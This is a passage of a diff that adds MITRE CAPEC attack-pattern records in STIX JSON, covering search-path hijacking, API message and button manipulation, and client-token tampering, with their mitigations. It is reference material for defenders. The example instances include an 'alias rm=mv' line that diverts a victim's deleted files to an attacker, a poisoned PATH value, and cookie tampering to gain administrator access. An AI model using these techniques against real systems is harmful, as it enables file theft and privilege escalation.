J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.", + "external_references": [ + { + "external_id": "CAPEC-38", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html" + }, + { + "external_id": "CWE-426", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/426.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "Hijack Execution Flow: Path Interception by Unquoted Path", + "external_id": "T1574.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/009" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Leveraging/Manipulating Configuration File Search Paths", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting\n alias rm=mv /usr/home/attacker\n In this case the attacker retains a copy of all the files the victim attempts to remove.\n ", + "\n A standard UNIX path looks similar to this\n /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:\n /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. 
At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to redirect search paths on the victim host." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef4b6415-f24e-432a-9f51-eb19c515d326", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program", + "id": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring", + "id": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c212a3ad-89fe-4eec-b57a-6c1471eb8a8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. 
Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.", + "external_references": [ + { + "external_id": "CAPEC-383", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/383.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-419", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/419.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Input Capture: Credential API Hooking", + "external_id": "T1056.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/004" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Harvesting Information via API Event Monitoring", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to gather information to potentially support further nefarious 
activities.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_prerequisites": [ + "The target software is utilizing application framework APIs" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.", + "id": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-383-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c553bedf-6dd2-4f6e-bb3f-680cd65f2c57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "spec_version": "2.1", + "target_ref": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. 
The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \"Adversary-in-the-Middle\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.", + "external_references": [ + { + "external_id": "CAPEC-384", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Message Manipulation via Man-in-the-Middle", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" 
+ ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. 
The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. 
In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.", + "external_references": [ + { + "external_id": "CAPEC-386", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/386.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Navigation Remapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and 
server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.", + "external_references": [ + { + "external_id": "CAPEC-387", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/387.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Navigation Remapping To Propagate Malicious Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n Performing this attack 
allows the adversary to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the adversarys' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the adversarys' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the adversary to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.\n ", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. 
Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.", + "external_references": [ + { + "external_id": "CAPEC-388", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/388.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Application API Button Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. 
The attacker, using a MITM proxy, observes the following data:\n [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]\n By altering the destination of \"Claim_Link\" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \"Yes\" or \"No\" causes the user to load the attackers' code.\n " + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. 
The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.", + "external_references": [ + { + "external_id": "CAPEC-389", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/389.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Content Spoofing Via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. 
If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.", + "external_references": [ + { + "external_id": "CAPEC-39", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/39.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/233.html" + } + ], + "id": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Manipulating Opaque Client-based Data Tokens", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.", + "Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \"u\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \"u\" for \"a\" by flipping some of the corresponding bits of ciphertext (trial and error). 
Once the correct \"flip\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.", + "Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions

  2. Techniques
    Use WebScarab to reveal hidden fields while browsing.
    Use a sniffer to capture packets
    View source of web page to find hidden fields
    Examine URL to see if any opaque tokens are in it
    Disassemble or decompile client-side application
    Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.
  3. Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.

  4. Techniques
    Look for signs of well-known character encodings
    Look for cryptographic signatures
    Look for delimiters or other indicators of structure

Experiment

  1. Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values

  2. Techniques
    Modify tokens logically
    Modify tokens arithmetically
    Modify tokens bitwise
    Modify structural components of tokens
    Modify order of parameters/tokens
  3. Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server

  4. Techniques
    Use network-level packet injection tools such as netcat
    Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
    Use modified client (modified by reverse engineering)
    Use debugging tools to modify data in client
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2" + ], + "x_capec_prerequisites": [ + "An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.", + "For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere." + ], + "x_capec_resources_required": [ + "The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data." + ], + "x_capec_skills_required": { + "High": "If the client site token is encrypted.", + "Medium": "If the client site token is obfuscated." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \"message authentication code\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, 